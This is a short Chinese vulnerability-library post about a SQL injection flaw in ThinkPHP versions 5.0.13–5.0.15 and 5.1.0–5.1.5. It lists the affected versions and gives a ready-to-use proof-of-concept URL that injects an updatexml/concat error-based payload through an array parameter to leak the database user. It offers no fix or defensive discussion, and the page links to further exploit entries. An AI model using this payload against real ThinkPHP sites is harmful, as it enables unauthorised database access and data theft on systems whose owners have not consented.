Thinkphp 5.0.(13-15)&5.1.(0-5) sql注入漏洞

棉花糖

2021年7月16日发布

070

—
title: ‘Thinkphp 5.0.(13-15)&5.1.(0-5) sql注入漏洞’
date: Sat, 03 Oct 2020 16:23:53 +0000
draft: false
tags: [‘白阁-漏洞库’]
—

### 漏洞影响

5.0.13<=ThinkPHP<=5.0.15 5.1.0<=ThinkPHP<=5.1.5 ### 漏洞POC 没开启debug看不到报错信息``` http://*********/index/index/index?username[0]=inc&username[1]=updatexml(1,concat(0x7,user(),0x7e),1)&username[2]=1

文章版权归作者所有，未经允许请勿转载。

THE END

漏洞库

喜欢就支持一下吧

点赞0 赞赏

请登录后发表评论

登录注册

请登录后查看评论内容

Thinkphp 5.0.(13-15)&5.1.(0-5) sql注入漏洞

请登录后发表评论

1致远OA checkComponentFile后台反序列化任意命令执行

2金和OA AjaxForDepartmentCollect.ashx SQL注入

3offsec WEB-300 课程：高级 Web 攻击和利用

4友加畅捷管理系统 RepFile.ashx 存在文件上传致RCE

5东胜物流软件 GetAuthorityRange 存在SQL注入

6安友固定资产管理系统 DoUpload 存在任意文件上传